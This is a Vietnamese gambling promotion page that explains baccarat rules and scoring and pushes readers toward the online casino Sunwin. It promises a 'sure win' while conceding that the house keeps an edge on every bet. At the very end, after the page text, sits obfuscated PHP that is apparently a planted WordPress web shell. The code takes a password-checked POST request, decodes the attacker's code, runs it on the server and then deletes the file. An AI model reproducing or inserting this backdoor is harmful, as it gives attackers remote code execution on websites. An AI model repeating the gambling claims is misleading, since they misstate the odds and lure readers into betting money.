Nguyên tắc chơi Baccarat – Mẹo nắm chắc phần thắng

- Xem(380)

Nếu bạn đang muốn chơi trò chơi đánh bạc ít phức tạp và nhiều thú vị như kiểu James Bond, thì baccarat là trò chơi nên thử. Có ba kết quả có thể xảy ra đó là cổng game, nhà con và hòa. Bài viết sau đây sẽ giới thiệu nguyên tắc chơi Baccarat và mẹo giúp bạn nắm chắc phần thắng.

Chơi Baccarat

Giới thiệu chung Baccarat

Bắt nguồn từ giữa thế  kỷ 19 ở Pháp, Baccarat, hay Punto Banco, là một loại trò chơi đánh bạc không cần kỹ năng kỹ thuật để chơi. Thường được chơi với số tiền đặt cược cao, Baccarat có thể được tìm thấy trong các phần chơi đặt cược tiền lớn của hầu hết các sòng bạc ở Châu Âu. Mục tiêu của trò chơi bài Baccarat đó là đặt cược vào ván bài mà bạn đoán sẽ gần bằng hoặc bằng 9 tương tự như các game Sunwin dự đoán khác. Tóm lại luật chơi đơn giản là ai gần điểm 9 nhất sẽ là người chiến thắng. 

Luật chơi

Cách tính điểm

Người chơi gần với 9 điểm nhất sẽ thắng.

Các lá J, Q, K và 10: 0 điểm

Lá Ách A: 1 điểm

Các lá số 2, 3, 4, 5, 6, 7, 8, 9: số điểm tương đương số nút.

Nếu các lá bài số cộng lại với nhau lớn hơn 10 thì sẽ điểm được tính trừ đi 10. Ví dụ: 6+8= 14 là tính 4.

Cách chơi

Để bắt đầu trò chơi, người chơi chỉ cần đi đến một bàn Baccarat và đặt cược vào một trong ba kết quả: nhà con, cổng game, hòa.

Người chơi

Nếu bạn đặt cược vào ván bài của mình và giành chiến thắng, bạn sẽ nhận được tiền thưởng là 1: 1. Cổng game có lợi thế hơn người chơi khoảng 1,24%.

Cổng game

Nếu bạn đặt cược vào cửa Cổng game mở và thắng, bạn sẽ nhận được tiền thưởng là 1: 1. Tuy nhiên, bạn sẽ phải trả cho cổng game khoản hoa hồng 5% trên số tiền thắng cược của bạn từ tay Cổng game. Cổng game có lợi thế hơn người chơi 1,06%. Số % này cũng tùy cổng game.

Hòa

Tuy nhiên, nếu bạn đặt cược hòa và thắng, bạn sẽ nhận được tỷ lệ trả thưởng là 8: 1 (đôi khi là 9: 1). Tuy nhiên, cổng game có lợi thế hơn người chơi 14,36%.

Khi cược được thực hiện, người chia bài sẽ rút 2 hoặc 3 lá cho tay bài của người chơi và Cổng game. 

Nếu một ván bài vượt quá 10, thì ván bài đó sẽ bị trừ đi 10. Ví dụ, ván bài 8 và 5 là 3 (13-10). Để thắng , bạn phải đặt cược trên ván bài Baccarat có tổng số gần hơn 9 điểm.

Chơi Baccarat online

Kết quả thắng

Nếu trong hai lá bài đầu tiên được chia, tổng điểm là 8 hoặc 9 cho Người chơi hoặc Cổng game, đây được gọi là chiến thắng tự nhiên và trò chơi kết thúc.

Quy tắc nhận lá bài thứ 3

 • Chơi Baccarat, thì người chơi và cổng game cũng đều được nhận 3 lá bài.  sau khi nhận 2 lá bài đầu tiên, cổng game còn phải dựa vào điểm của người chơi thì mới có thể nhận bài thêm.
 • Nếu cổng game đang có số điểm từ 0 đến 2 điểm thì cổng game sẽ luôn được nhận thêm bài nữa. Nhưng nếu cổng game có điểm là 3 thì sẽ không được nhận khi lá bài thứ 3 của người chơi là 8.
 • Nếu 2 lá bài đầu của cổng game là 4 điểm thì cổng game sẽ không được nhận thêm bài nếu lá bài thứ 3 của người chơi là 0, 1, 8 hoặc là 9.
 • Nếu mà 2 lá bài đầu cổng game là 5 điểm thì cổng game sẽ không được nhận thêm bài nếu lá bài thứ 3 của người chơi là 0, 1, 2, 3, 8, 9.
 • Nếu điểm 2 lá bài đầu của cổng game là 6, cổng game chỉ được nhận lá bài thứ 3 nếu lá bài thứ 3 của người chơi là 6 hoặc 7.
 • Nếu 2 lá bài đầu cổng game là 7 thì sẽ luôn giữ nguyên.
 • Ngoài ra, nếu điểm của cổng game và người chơi là 8-9 thì đều không nhận thêm bài.

Cách cược tốt nhất trong Baccarat

Để dễ thắng khi chơi Baccarat thì bạn nên luôn đặt cược vào Cổng game.

Đây là lý do tại sao:

 • Mặc dù hầu hết các Sòng bạc đều áp dụng hoa hồng cho lần đặt cược này (~ 5 phần trăm), nhưng đây là mức cược tốt nhất trong trò chơi.
 • Bạn có rất ít cơ hội để đánh cược Hòa đến mức chỉ có một con bạc điên rồ, mới chọn tùy chọn thứ ba này.
 • Đó là tất cả những gì cần làm.
 • Ngồi vào bàn, đặt tiền của bạn vào cổng game Banker, và đợi cho đến khi đến thời điểm thích hợp để rút ra số tiền bạn đã thắng.

Trên đây là nguyên tắc chơi Baccarat cũng như mẹo nắm chắc phần thắng mong rằng sẽ giúp ích được cho các bạn. Bạn có thể chơi Baccarat tại Sunwin, đây là một cổng game uy tín từ Macao mà bạn có thể tham khảo.

to top if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}